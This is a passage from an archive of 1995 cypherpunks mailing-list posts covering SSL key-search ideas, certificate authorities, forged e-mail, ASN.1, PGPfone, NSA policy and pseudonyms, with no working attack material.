      early stages of a crisis, before ground troops were in
      place. It would travel with other ships and submarines
      for protection, and target information would be provided
      by other vessels, reconnaissance aircraft, pilotless
      drones or ground spotters. The 825-foot ship might
      require fewer than 20 people to operate, compared with
      the 5,000 aboard a 1,040-foot carrier.


   ARS_tug











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sun, 3 Sep 95 08:25:01 PDT
To: lyalc@ozemail.com.au (lyal collins)
Subject: Re: A bold ssl idea ?
In-Reply-To: <199509031145.VAA12843@oznet02.ozemail.com.au>
Message-ID: <"swan.cl.cam.:180200:950903143250"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I understand that setting up RC4 keys is slower than testing for the correct
> key (I may have misunderstood this bit).

For pure RC4, Yes.  However, SSL is not pure RC4.

> Is it considered practical to modify the brutessl code to have multiple
> message data, and test each against a key from allocated key space ?

You are the third person I've heard think of this.
[ The first did quite a lot of calculations before spotting the problem ! ]

> If so, this may mean that perhaps 3 message can be tested against a single
> in the time two single keys could be tested against one message.

Well, the original suggestion I heard was to try 64K at a time :-))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 08:38:02 PDT
To: cypherpunks@toad.com
Subject: hks cypherpunks newsserver down
Message-ID: <v02120d12ac6f8aa91f93@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


nntp.hks.net's cypherpunks mail -> news gateway has not shown new messages
for more than a week. Strangely, only the cp list seems to be affected.
Anyone know what's up?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Sun, 3 Sep 95 05:53:33 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <199509031253.IAA23207@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart <stewarts@ix.netcom.com> writes:
>At 08:41 PM 8/29/95 -0400, [ I, Dave Conrad ] wrote:
>>One benefit to law enforcement, quite apart from the ability to verify a
>>license, would be the accumulation of a database of thumbprints of all
>>citizens, or at least all those who drive.
>
>They can get that by just collecting it when you get the license (which CA
>does), without having to cram it onto the back of the license.

Obviously, but I think many people would resist it if they collect it just
for the sake of collecting it.  But if they say they are collecting it to
put on the license in order to verify licenses "in the field", then the
collection will be a lot more palatable to a lot more people.

Have people in CA complained much that they collect it when you get the
license?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEmhsxEcrOJethBVAQHFqQP9HvbaGMe4pQhlH1EsS9MKuC1L2+DlnXLb
lhkzJ9OJHRBJ7lN437I2W04ec0YRZXv3vf3Y3CMlYD1w09Ih54ugZYWzQbG7meu/
SHikLH0KVz86RlCUi5qzCrX3Zs+sFXTvkTSJ5t7G7o24/wpxxB2hy+4NBedTPp3o
yYWrn+p0sRU=
=mzOJ
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bigdaddy@ccnet.com
Date: Sun, 3 Sep 95 10:09:37 PDT
To: Cybie@cris.com
Subject: Re: Direct Socket to Remailer?
In-Reply-To: <9509030907.AA04231@mariner.cris.com>
Message-ID: <Pine.SUN.3.91.950903090122.13715B-100000@ccnet3>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995 Cybie@cris.com wrote:

> Before you do it, make sure your ISP doesn't mind you telnetting to port 25.
> VCU's computer dept. doesn't take too kindly to it.  They're worried about 
> people sending forged e-mail.  (I was tempted to tell the guy when I got 
> caught doing it that they should put a copy of PGP online for folks to use.
> But I just wanted my account re-instated.)

	CMU's systems, for instance, are nice enough to explicitly warn 
you 'Mis-identifying the sender is an abuse of computing resources.' on 
their machines' port 25. I take this to imply that they don't take kindly 
to such use of their machines by students or non-students...but 
what they would do to a non-CMU student is not clear. Come to think of 
it, would there be legal issues involved in forging e-mail addresses? Can 
one have a reasonable expectation of identity in ordinary e-mail? 
Probably not. How about mail authenticated with PGP, RIPEM, Notes, or 
a similar system?

We've seen key certification by VeriSign, among others...and, if we assume a 
certification structure which requires checking the True Name of the 
person, then we have a link between the key and the identity. All well 
and good.

If we add key escrow to this certification structure, or require a True 
Name for *all* keys, then one could have 
'identity escrow'...a situation in which pseudonymous keys can be 
created and distributed with certification that they really belong to a 
(presumably unique) True Name. In the example of a bank with anonymous 
officers, their identities might be held by another 
organization(oversight committee, industry certification authority, 
etc.), and revealed in the event of an investigation. 

Doesn't VeriSign already sign 'Personality Certificates'(sorry if not the 
right term) for pseudonymous IDs? 

Obviously, setting and enforcing limits on keys per person, should that 
be desirable, could be difficult. In the simplest case of one verified 
key and identity per person, an entity who can satisfy the verification 
process multiple times can be issued multiple keys. If there are a number 
of independent Certification Authorities, and assuming they don't 
cross-check, one could get as many keys as there are CAs. Lag time 
between, say, the Dhahran, Saudi Arabia office of the CA and the rest of 
the structure might also allow for two or more keys at once.

There's probably a dozen different ways to fool a CA or group of CAs. 
Unfortunately, they're likely to be so difficult, and the penalties 
severe enough(e.g. permanent revocation of all keys with a particular 
CA), that few will use them. 

I wonder if this sort of "feature" is already on tap for a Government 
Certification Authority in the U.S.. If pseudonymity is offered at 
all(perhaps as a 
sort of compromise), it seems reasonable that any State-sponsored CA 
would insist on identity escrow. The next logical step, of course, would 
be to subordinate, discredit, or outlaw other CAs, in order to minimize 
the 'possibility' of 'evil criminals' using the 'national information 
infrastructure' for 'nefarious acts of impersonation'.

Web-of-trust would probably still be legal. It would be absurdity to even 
attempt to outlaw it, as one would hope the example of PGP has shown. One 
might as well outlaw gossip. 
Unfortunately, web-of-trust is rarely as extensive(at least for me) as 
a full-blown certification hierarchy. It is certainly more work.

In effect, the State would reserve to itself the ability to certify keys 
on a large scale, on its terms. Scary.

On the other hand, it could also make for some very interesting 
situations...such as a pseudonymous identity, accredited by the State, 
able to participate in elections, enter into binding contracts, and 
telecommute to work. Again, making sure no one registers and votes 
twice might be a bit of work. Perhaps down the line, such 
an identity could run for office. The line 'I'm With Stupid' 
takes on a whole new meaning...

David Molnar

P.S. Andrew L : Yes, I'm the same person you knew in 
Houston! Have you received the mail I sent you? 
-Haynow








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Sun, 3 Sep 95 07:58:54 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto '95: Robert Morris
Message-ID: <199509031457.KAA21322@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM 9/3/95 +0200, you wrote:
>So Robert Morris worked for NSA.
>Does that mean that the infamous 1988 Internet Worm
>was part of a NSA-sponsored intelligence-gathering mission?

Robert Morris Jr. wrote the worm. His father, Robert Morris Sr.
worked for the NSA.


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Magee <Tim@alia1.demon.co.uk>
Date: Sun, 3 Sep 95 15:15:52 PDT
To: cypherpunks@toad.com
Subject: Re: anyone know what this "top secret" code does?
Message-ID: <150@alia1.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In your message dated Saturday 2, September 1995 :
> Does anyone remember the scenario someone suggested awhile back that
> hypothesized a scheme by the NSA or other TLAs to encourage the use
> of WEAK crypto?  It involved spreading a lot of F.U.D. about PGP and
> other strong crypto methods, followed by the discovery/leak of a
> supposedly "strong" crypto algorithm to replace it.

If the YFTLA could diffuse actual source of a method *supposedly* stronger than 
IDEA and get away with it, could they not equally well get away with planting 
their man Zimmermann and having him publish PGP with a cunning trapdoor?  Let's 
see, to lend cred to that though they'd probably have to have him arrested on 
trumped-up charges and generally harassed ...

Many people only THINK they know what cynicism means.

Seriously: I've not been round long enough to have a good idea how likely my 
proposed scenario is.  You can all probably tell me things about Z's provenance 
which blow my little theory sky-high.

cheers,
tim M.
-- 
"Man is born free, and everywhere he is very reasonable." -- Rousseau (roughly)
Tim Magee, e-mail: Tim@alia1.demon.co.uk, tel: +44-1225-316785





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Sun, 3 Sep 95 02:50:21 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto '95: Robert Morris
Message-ID: <199509030950.LAA15691@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


So Robert Morris worked for NSA.
Does that mean that the infamous 1988 Internet Worm
was part of a NSA-sponsored intelligence-gathering mission?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 3 Sep 95 03:04:39 PDT
To: cypherpunks@toad.com
Subject: Re: sums with BIG numbers
Message-ID: <v01510102ac6e97a01432@[193.74.217.9]>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant wrote:

>>
>What do you mean? How big numbers are added (trivially easier than
>multiplication
>or division) or how it handles numbers that are too large for the variable's
>size?

and Ray Cromwell wrote :

To add two bignums, P(x) and Q(x) simply sum coefficients of like
terms like you would with any polynomial addition, with one simple
modification. If a_k is the coefficient of the x^k term of P(x), and

etc, etc.


Just a quick clarification, people:

In the UK, and, presumably Australia, "doing sums" refers to performing any
kind of arithmetic, not just addition.


And to Sherry Mayo:

Don't give up on the code, just yet.  Try running it and watching it with a
debugger.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 3 Sep 95 12:49:19 PDT
To: don@cs.byu.edu
Subject: Re:  SSLRef (SSLtelnet)
Message-ID: <199509031948.MAA17974@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The link I used recently to get SSLREF is <URL:
http://www.netscape.com/eng/ssl/sslref2.0/index.html>.  I don't know what
kind of export restrictions this enforces.

I was hoping to write a program which would sit on the user's PC and act
as a proxy for Netscape's browser.  It would connect using 128 bit SSL
instead of 40 bit.

The stumbling block is that Netscape won't connect to even the local
proxy unless it sees a valid certificate, one signed by a CA that it
accepts.  For this application I would need such a certificate, and make
the corresponding public and private keys public, hard-coding them into
the proxy.  Since the proxy runs on the same PC as the browser there is
no need for confidentiality between them, and the secret key can be
revealed.

Does anyone have an idea for a way to acquire a certificate acceptable to
Netscape, perhaps one with a "broken key", that could be used for this
purpose?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Sun, 3 Sep 95 12:26:51 PDT
To: cypherpunks@toad.com
Subject: Re: Dumb Question: PGPfone over Appletalk
Message-ID: <v02130500ac6fad38bbbe@[199.117.100.2]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Can someone tell me how to run PGPfone over Appletalk ? The
>documentation says that support has been added for this release, and
>there's a preferences box to check to use it, but there's no information
>I can find in the documentation on how to initiate a call over
>Appletalk.. it just says to enter a telephone number to dial. If I
>press 'Connect' without entering anything it hangs up the Mac.
>
>How do I tell it which machine I want to connect to ?
>
>        Mark "Don't know much about Macs" Grant

My guess is that you're on a network with multiple AppleTalk zones.  The
"PGPfone 1.0b4 README" file mentions a known bug that causes PGPfone to
freeze when trying to bring up its AppleTalk Browser.  The Read Me file
then goes on to explain how to connect anyway.  Be sure to use a
semi-colon, not a colon, between the zone name and the macintosh name...


Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEn+T/obez3wRbTBAQHG7gP+J8It6kZTRYhte2ffTSzflQB8ff14a2pR
VR81PD0HIjE5cyNTrAlA6FdVGguy21BIK+tUz5rmQBRuZP46OWynBqk4y551M+fg
JjnEOk2jXNBZDFdwT9fy5hWc3g38os6vto5/4vsj5Vhw0+6EoVojzJ8AU99ibG7z
pKnPhQnpISI=
=8lQJ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 3 Sep 95 10:59:07 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto '95: Robert Morris
In-Reply-To: <199509030950.LAA15691@utopia.hacktic.nl>
Message-ID: <199509031758.NAA01453@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Name Withheld by Request writes:
> So Robert Morris worked for NSA.
> Does that mean that the infamous 1988 Internet Worm
> was part of a NSA-sponsored intelligence-gathering mission?

You have the junior and senior Robert Morris confused.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sun, 3 Sep 95 11:16:31 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Mail to mail.cypherpunks "newsgroup" echoes to list
Message-ID: <Pine.PMDF.3.91.950903141403.541101819G-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have been getting a load of duplicate mail from this group; not all 
messages are duplicated, only those cc'd to mail.cypherpunks as well as 
sent to the toad.com address.

I don't know if this is a gateway to a local newsgroup or what, but I 
wish the duplication would stop.  Thank you.  

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki

---------- Forwarded message ----------
Date: Sun, 03 Sep 1995 08:38:54 -0600 
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
To: lyal collins <lyalc@ozemail.com.au>
Cc: cypherpunks@toad.com, Piete.Brooks@cl.cam.ac.uk
Newgroups: mail.cypherpunks
Subject: Re: A bold ssl idea ? 

> I understand that setting up RC4 keys is slower than testing for the correct
> key (I may have misunderstood this bit).

For pure RC4, Yes.  However, SSL is not pure RC4.

> Is it considered practical to modify the brutessl code to have multiple
> message data, and test each against a key from allocated key space ?

You are the third person I've heard think of this.
[ The first did quite a lot of calculations before spotting the problem ! ]

> If so, this may mean that perhaps 3 message can be tested against a single
> in the time two single keys could be tested against one message.

Well, the original suggestion I heard was to try 64K at a time :-))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Sun, 3 Sep 95 11:36:26 PDT
To: cypherpunks@toad.com
Subject: Looking for NII IP "White Paper"...
Message-ID: <9509031836.AA23248@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


According to an article in Sunday's _Washington Post_ the final draft of
the "Intellectual Property and the National Information Infrastructure"
report is going to be released Tuesday morning.  You may recall the
preliminary draft of this report, a.k.a. the "Green Paper", and its
proposed changes to U.S. Copyright Law.  

Does anyone on the list have a copy of the final draft/"White Paper"?
The administration is evidently keeping it under pretty tight wraps,
probably because of the intense criticism the Green Paper received.
Personally, I expect the White Paper to be just as bad.

					--bal

References:

The Green Paper/Preliminary Draft is available at:

   http://www.uspto.gov/niiip.html

Pam Samuelson's critique, which appeared in _Communications of the ACM_
and which you should definitely read, is available at:

   http://www-swiss.ai.mit.edu/6095/articles/samuelson-nii-cacm-dec94.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@isse.gmu.edu (Pat Farrell)
Date: Sun, 3 Sep 95 11:39:09 PDT
To: pfarrell@netcom.com
Subject: WEB pointers for NIS&T Key Escrow meeting
Message-ID: <9509031838.AA01294@isse.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


To save list bandwidth, I've put the agenda, attendee list, and
the three discussion topic papers for this week's Key Escrow 
meeting on my web. url: http://www.isse.gmu.edu/~pfarrell/nistmeeting.html

I'll add anything else I get from NIS&T, and any pointers folks
send my way.

Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 14:35:50 PDT
To: cypherpunks@toad.com
Subject: NIST attendee list
Message-ID: <v02120d18ac6fde2f25f8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


The dangers of public attendee lists. Some Cypherpunk might match the list
against east coast lawyers and break Black Unicorn's nym.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sun, 3 Sep 95 12:52:12 PDT
To: cypherpunks@toad.com
Subject: Re: ASN.1 and Kerberos version 5
In-Reply-To: <ac6e483800021004fa65@[18.162.1.1]>
Message-ID: <9509031951.AA23373@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I don't think that the concept of ASN.1 is as bad as Jeff makes out. If it worked 
then ASN.1 would be very very useful. But it just plain doesn't.

ASN.1 is worse than useless, it means that a very good idea is rendered unusable 
because of a badly botched implementation.

The ambiguities of the ASN.1 spec are at least as bad as Jeff makes out. I have 
attempted to implement an ASN.1 compiler but I have little confidence in its 
correctness because the structure of ASN.1 is so unwieldy. It is not just ANY 
that causes problems, IMPLICIT is a complete cock up.


ASN.1 is poor because it is unnecessarily complex, has little intellectual 
coherence and has been extended in a manner which conflicts with the original 
design principle. 

Is it any coincidence that ASN.1 backwards is the name of a well known 
organisation? Also the only person who has defended ASN.1 to my face happened to 
work for that organisation once.


So the motto is: ASN.1 - Just say NO!

		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sun, 3 Sep 95 13:17:32 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: SSLRef (SSLtelnet)
In-Reply-To: <199509031948.MAA17974@jobe.shell.portal.com>
Message-ID: <199509032018.QAA03382@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


hfinney@shell.portal.com said:
> Does anyone have an idea for a way to acquire a certificate 
> acceptable to Netscape, perhaps one with a "broken key", that could 
> be used for this purpose? 

RSA will give out certificates to individuals; Apple includes a coupon for a 
free one with their MacOS 7.5 (and 7 Pro) release.  There's a program for the 
Mac (RIPEM Mac) that will convert the keys returned into RIPEM usable 
PEM-format keys.  Isn't that what SSL uses?

The only question is what CAs are supported by the browser....  I think the 
Apple keys are under RSA's Unaffiliated User CA...

If there's interest, I'll look further into this.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Sun, 3 Sep 95 14:40:59 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: NIST attendee list
In-Reply-To: <v02120d18ac6fde2f25f8@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950903174027.8153A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995, Lucky Green wrote:

> Date: Sun, 3 Sep 1995 14:39:38 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: cypherpunks@toad.com
> Subject: NIST attendee list
> 
> The dangers of public attendee lists. Some Cypherpunk might match the list
> against east coast lawyers and break Black Unicorn's nym.
> 

Luckily I've accounted for this.


> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 3 Sep 95 17:55:13 PDT
To: jim@acm.org
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509030434.VAA24841@mycroft.rand.org>
Message-ID: <199509040052.RAA25910@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



jim@acm.org:

>- By the middle to late 1960's cryptanalysis became less cost effective
>  than obtaining the information by other means -- wiretaps and so on.

but for some reason, the NSA keeps humming along...? perhaps 
confirming the rule that bureaucracies, like bores at parties,
persist long after they are relevant?

>In the future there will be more radio used for ordinary communications.
>Americans are unwilling to pay for secure telephones, but that's not the
>case in Europe.

I object to this highly. the NSA has very little credible understanding
of market forces, IMHO. they are a government agency. they do not
understand marketing or human psychology. Clipper, the closest the
agency has come to creeping out of the darkness of their coffin,
was a total fiasco. the self-destructing director of NSA whats-his-name
who was running for that FBI position or whatever is another example of how
the inbred spook society has difficulty dealing with anything outside
their artificial reality.

as for the market viability of cryptographic phones, I think this
is duplicity ranging on utter lying that "the US public is not 
willing to pay for secure phones". this is precisely the baseless
rumor and conventional wisdom one would expect the NSA to attempt to
spread and use to surreptitiously manipulate the natural market direction.
every phone company would avoid even introducing a phone model
because "after all the public is not willing to pay for encryption".
sure, maybe they won't pay for the very finest encryption money
can buy, but they can get some pretty awesome bang for minor bucks
when it comes to crypto.

the fact is, cryptography is becoming EXTREMELY CHEAP. virtually
all phones are going to have some high power microprocessor inside
that could be used to do semi-decent secure encryption, far better
than *nothing*, the current status quo-- *for free*, virtually, because
the phone is already going to have some serious horsepower. the whole
issue of "signal transformation" is very intrinsic to the existing
phone circuitry anyway.

extremely secure encryption (i.e. that the NSA is not likely to
break at all) is another issue, but again chips are becoming
awfully cheap.

so I say anyone spreading a rumor that "american public doesn't
want encryption or is not willing to pay for it" (esp. in 
cell phones or whatever) is either:

1. intentionally lying
2. rather clueless
3. making an unwarranted and undemonstrated assumption
4. possibly has an axe to grind-- i.e. axeing widespread public
encryption

furthermore, the idea that someone from NSA would say something
like "the U.S. public doesn't want so-and-so" encryption I find
highly repulsive. the NSA's business is based on SUPPRESSING ENCRYPTION.
it would be hard to find a more biased and less credible opinion
anywhere. the NSA has done the very best job of sabotaging the 
natural growth of cyberspace by having its slithering tentacles
lodged into key areas of influence within our government, while
at the same time pretending that  it is actually working in our
own best interest.

--

frankly, I think any anti-encryption sentiment is inherently
unpatriotic. you see, there is far more to be gained from widespread
encryption than is to be lost from it. the NSA in their anal
retentive, freedom-pissing mode will never understand this, or
never appraise the situation unbiasedly, but it appears to me
to be fairly unequivocal that there are tremendous benefits
from the availability of widespread, seamless, invisible 
encryption.

if the NSA released one public report that analyzed the actual
cost benefit ratio to *society* of free encryption, that is the
day I will scrape a smidgeon of respect for this vile, odious,
noxious excuse for a publicly funded institution. but the NSA
will never do this, because 

(1) the NSA can barely stand to address the congress honestly
and openly, and virtually never does even this, and so the
idea of justifying its existence to the actual public that
pays for its spook toys is beyond distasteful to the agency,
it would be sacrilegious!!

(2) they are incapable of an 
unbiased opinion on the issue, in fact they are probably not
even capable of any opinion that is not duplicitous and inherently
self-serving beneath a surface sugar-coating of actual legitimacy, 

(3) they don't want to admit that
their main motive, their raison d'etre, has absolutely nothing to 
do with maximizing overall public welfare-- it has to do with maximizing 
their own budget and maximizing intelligence available to their
omnipresent tentacles.

but thanks, JG, for a look into the dark, squirmy, teeming recesses of 
some perverted spook's mind. I would thoroughly enjoy any other choice
morsels you have to offer about the lies that spooks tell each other to
justify their existence. and the ones that they actually believe are by
far the most entertaining! <g>

--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 3 Sep 95 18:33:54 PDT
To: cypherpunks@toad.com
Subject: pseudonyms & list health
Message-ID: <199509040131.SAA29509@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


P.M. remarked in exasperation a little while ago that
he thought that some of the best minds had been lost in list
attrition due to high traffic, naming some people who had
seemingly dropped from the list (Bill Stewart? Phil Karn?)

but what if these people had just stopped subscribing under
their clear name? and started using a pseudonym?

this brings to light the idea that credibility is hard won,
and that it is hard to get, and that people need all the
credibility that they can achieve. it seems that virtually
all accomplishments are credibility-enhancing, and people
only "notch down" their reputation estimations in extreme
circumstances. 

hence, what I am suggesting is that one
of the "stable attractors"  that TM is always talking about
may be a reality in which people pool most of their accomplishments
under a single nym. furthermore, they will wish to avoid conflict
with other nyms in respect to attribution. 
isn't this, functionally, the equivalent of the supposed
anti-cypherpunk "true names"?

now, I'm not suggesting that "if you want to do something in
secret, you must have something to hide". (although that seems
almost like a tautology to me). but what I am suggesting, is
that if you want to get credit, it may pay to pool all your
accomplishments under one nym (tracing it to a physical body
is a whole separate issue-- the two should not be confused;
although the concept of "true names" does tend to blur this
distinction).

in the case of PM, he thought that because some people ostensibly
dropped from the list, the list quality had decreased. but
he seemed to be making this conclusion based on their "real
identity". what if they were still around, posting under
pseudonyms? would he be able to tell? would the signal quality
be the same?

the point is that people seem to judge list quality based on
criteria in which "true names" play a major role. I'm not saying
this is the only way to do it, but I am saying that "true names"
seem to be very much ingrained into human psychology, particularly
in public forums and attributing credit, and the idea that they are 
wholly irrelevant to most human endeavor
is very suspicious, at least deserving more than a few paragraphs
of supposed proof.

--

another problem with pseudonyms and list noise is the following.
first, let me start by saying I think this list approaches the
"dysfunctional" level at times when everyone is ranting about each
other about staying on topic. there is an awful lot of hostility
on this list. maybe people like it, I'm not sure. I'm interested
in the sources of this hostility, though, and I think I can identify
some good candidates.

the list hostility and tension is quite palpable. when TM prefaces
many of his posts, and many others do, with frequent apologies about
being on topic, I am amazed to see this because I don't see people
so self-conscious on other mailing lists. 

in my opinion, this is where the role of the moderator is absolutely
critical. any mailing list with an AWOL moderator is only asking
for total chaos, IMHO. in this case I'll use the word "moderator"
and "list creator" interchangeably.

the best recommendation to everyone who subscribes to the list,
and to the moderator, is that THE MODERATOR DETERMINES WHAT IS RELEVANT.

that means that no one else has the authority to do this, NO ONE. if 
you find a post that bothers you, FIRST WRITE THE LIST MODERATOR.
ask the LIST MODERATOR to deal with the offending poster.

the list moderator should make a judgement when the list is in a 
"noise" phase and try to be clear about what is relevant to the
list and what is not. what this requires is a watchful eye and
regular interventions, IMHO.

a list where the moderator is never around may seem like a haven,
but in my opinion it only turns into a grouch free-for-all subject
to regular conflagrations that leave everyone *really* pissed off,
as did a recent eruption by TM and PM.

now, whenever you see someone write, THIS ISN'T RELEVANT TO THIS LIST!!
THIS DOESN'T HAVE ANYTHING TO DO WITH CRYPTO!! IMHO you should gently
remind this person in email that THEIR OPINION OF WHAT IS RELEVANT OR NOT IS
NOT RELEVANT. tell them to write the list moderator first, IN EMAIL. jamming
up the communication medium with meta traffic about what is and is
not relevant is absolutely futile and useless and counterproductive
and extremely anxiety producing.

so, as you can see, IMHO people who are continually making judgements
about what is or is not relevant to the list, and posting those 
opinions, are PART OF THE PROBLEM.  (I am reminded of one himself talking 
about people who are part of the problem and who is part of the solution. 
well, IMHO, ironically, he is PART OF THE PROBLEM, and for a very obvious 
and clear reason that even an intelligent child could grasp).

--

the Yin to the Yang of all this, however, is that the LIST MODERATOR
MUST OCCASIONALLY SHOW HIS FACE and make unambiguous rulings about
what is and what is not appropriate, especially when the noise level
increases and people start to wonder.

the problem with this is a list moderator who likes to use one or
two pseudonyms. the pseudonyms may be so secret that not *anyone*
on the list is aware of his identity, even close friends. this 
list moderator may be loath to ever post under his "true name"
or whatever name he used to start the list. 

anyway, you can see that this whole business of pseudonyms, while
perhaps workable, is certainly fraught with pitfalls IMHO. at least
in situations of *public forums*, I am going to go out on a limb
and say that it is very troublesome.

it seems that in any forum, there are people who will try to disrupt
the proceedings so to speak. in real life you can throw them out,
by identifying their *picture*.

in a cyberspace that lacks true identities, you cannot throw out
these "problem people". they continually come back to haunt you
despite your best attempts to bar them. doesn't that bug you?
doesn't that irritate you? doesn't that drive you crazy? or do you
like the idea that the person you most hate in life might be posting
behind any of the next few messages? and there's nothing you can
do about it? because you in fact embrace the capabilities that let
him do this, and you're pretty sure you're not a hypocrite?

well, just some musings for those who unabashedly promote pseudonyms
to contemplate.

p.s. in regard to the above, about "people other than the moderator
posting judgements about what is and is not relevant to the list",
I am not making a judgement about what is and is not relevant
on the list. I am making a judgement about making a judgement
about what is and what is not relevant on the list. <g>

--Vlad Nuri




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Sun, 3 Sep 95 15:41:09 PDT
To: cypherpunks@toad.com
Subject: LR/SHS src (386 ASM)
Message-ID: <199509032235.SAA03213@csws5.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



I have uploaded a copy of lrsha14.zip to the cypherpunks ftp site.

It contains source code for a 32-bit implementation of the Secure Hash
Algorithm as well as a Luby-Rackoff/SHA cipher in CFB mode, and a sample
Turbo Pascal interface for debugging it, etc.

-Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sun, 3 Sep 95 18:40:08 PDT
To: cypherpunks@toad.com
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com>
Message-ID: <199509040139.SAA26859@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> jim@acm.org (reporting on R. H. Morris' talk at Crypto '95):

> >- By the middle to late 1960's cryptanalysis became less cost effective
